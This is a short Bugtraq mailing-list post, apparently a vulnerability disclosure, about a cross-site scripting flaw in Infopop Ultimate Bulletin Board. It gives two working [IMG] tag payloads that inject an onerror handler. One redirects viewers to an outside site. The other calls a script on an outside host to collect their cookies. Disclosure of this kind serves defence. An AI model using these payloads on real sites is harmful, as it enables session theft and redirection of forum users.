Здравствуйте, уважаемый(ая) bugtraq, Posting something like this UBB tag: [IMG]http://about:test"onerror="top.location.href='http://punk.tomsk.ru';[/IMG] to Infopop Ultimate Bulletin Board, we are able to redirect users browser to http://punk.tomsk.ru There are many ways to stole cookies using this vulnerabliety, one of them: [IMG]http://about:test"onerror="this.src='http://somedomain.com/yourscript.php';[/IMG] and yourscript.php - is a script to recieve users cookies 8) -- // Э.Заитов AKA kyprizel mailto:kyprizel@hostel.tusur.ru ICQ#3337333 -- "Knowlege itself is power..." F.Bacon --
